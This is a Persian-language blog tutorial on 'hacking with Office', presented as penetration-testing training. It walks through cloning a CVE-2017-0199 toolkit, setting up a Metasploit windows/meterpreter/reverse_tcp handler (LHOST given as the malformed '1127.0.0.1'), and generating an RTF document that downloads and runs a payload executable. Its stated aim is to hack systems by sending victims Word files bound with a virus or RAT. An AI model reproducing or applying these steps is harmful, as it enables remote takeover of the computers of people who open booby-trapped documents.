هک با افیس ( ابزار و اکسپلویت بایند با DOC )

هک با افیس

اموزش تست نفوذ و امنیت سیستم با استفاده از فایل های های مجموعه افیس و ترکیب ان با فایل ویروس یا رات 
در ادامه اموزش هک افیس با مرجع اموزش هک و امنیت همراه باشید همراه با ابزار و اکسپلویت

هک با افیس

توضیحات ابزار هک با افیس

بسیاری از هکر ها برای نفوذ خود در یک سیستم از روش های مختلفی استفاده میکنن که یکی از این روش ها ارسال فایل از مجموعه افیس است
یعنی به طور مثال با ارسال فایل .docx که یک فایل ورد است اقدام به هک میکند با اجرای فایل ورد هم ویروس اجرا خواهد شد و هم فایل اصلی 
ما در این اموزش قصد داریم با استفاده از این اسیب پذیری مجموعه افیس ترکیب فایل مخرب با فایل ورد را اموزش دهیم 
ابزاری که معرفی خواهیم کرد با استفاده از اسیب پذیری ثبت شده CVE-2017-0199 کار میکند و قادر است به سادگی بدون پیچیدگی زیاد فایل را ترکیب کند
 

امکان کارکرد این اکسپلویت تا مجموعه افیس چه سالی عمل میکند ؟

  •  2007
  • 2010
  • 2013
  • 2016

امکانات ابزار تست نفوذ با مجموعه افیس

  • امکان استفاده از پسوند .ppsx
  • مکان استفاده از پسوند .doc
  • امکان ترکیب با فایل .exe
  • امکان ترکیب با .hta
  • انتخاب پورت اتصال
  • اجرای ابزار در هر سیستم عامل
  • استفاده در متاسپلویت

اموزش نصب و اجرا

در ابتدا برای نصب این ابزار لینک دانلود ابزار را از بخش دانلود در اخر اموزش دریافت کنید
سپس در دستور زیر لینک ابزار را جایگزین کلمه Link کنید و دستور را وارد کنید

git clone Link

با دستور زیر وارد پوشه دانلود شده شوید

cd CVE-2017-0199

 حال در صورتی که پایتون 2.7 رانصب شده دارید با دستور زیر ابزار را اجرا کنید

python cve-2017-0199_toolkit.py

برای مشاهده سویچ های راهنما از سویچ -h استفاده کنید

python cve-2017-0199_toolkit.py -h

هک با افیس ( ابزار و اکسپلویت بایند با DOC )

اموزش ساخت پبلود و استفاده از ابزار برای ترکیب پیلود با مجموعه افیس

برای ساخت پبلود با دستور زیر متاسپلویت را اجرا کنید

msfconsole

و به مسیر اکسپلویت بروید

use multi/handler

پیلود مورد نظر را انتخاب کنید

set PAYLOAD windows/meterpreter/reverse_tcp

ای پی سیستم را وارد کنید 

set LHOST 1127.0.0.1

و با دستور run پیلود ایجاد خواهد شد
حال با دستور زیر اکسپلویت را اجرا و بر روی پیلود اعمال کنید
دقت داشته باشید در قسمتی که ادرس فایل و ای پی داده شده است ادرس درست سیستم خود را وارد کنید

python cve-2017-0199_toolkit.py -M exp -t RTF -e http://127.0.0.1/payload.exe -l /tmp/payload.exe

 

  مانیتور کردن توییتر با ابزار TwitWork

دانلود ابزار هک با افیس



[ برای دریافت فایل وارد شوید و یا ثبت نام کنید! ]

موفق و پیروز باشید
 

0/5 (0 نظر)

نیما حسینی هستم بنیان گذار تیم پن تست کور و مدرس دوره های تست نفوذ و امنیت ، در 5 سال گذشته متمرکز بر مباحث روز هک و امنیت بوده ام و بعد از کسب دانش و تجربه های ارزشمند تصمیم بر به اشتراک گذاری نتیجه ان ها با دیگران گرفته ام.

مطالب مرتبط

تزریق کد

تزریق کد به وب سایت با اسیب پذیری XSS

در این آموزش با نحوه جستجو کردن آسیب پذیری از طریق ابزار PwnXSS برای تزریق کد به وب سایت آسیب پذیر آشنا خواهید شد،با ما در ادامه این آموزش همراه باشید. 0/5 (0 نظر)   هک FTP از طریق کرک با متاسپلویت و امنیت

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *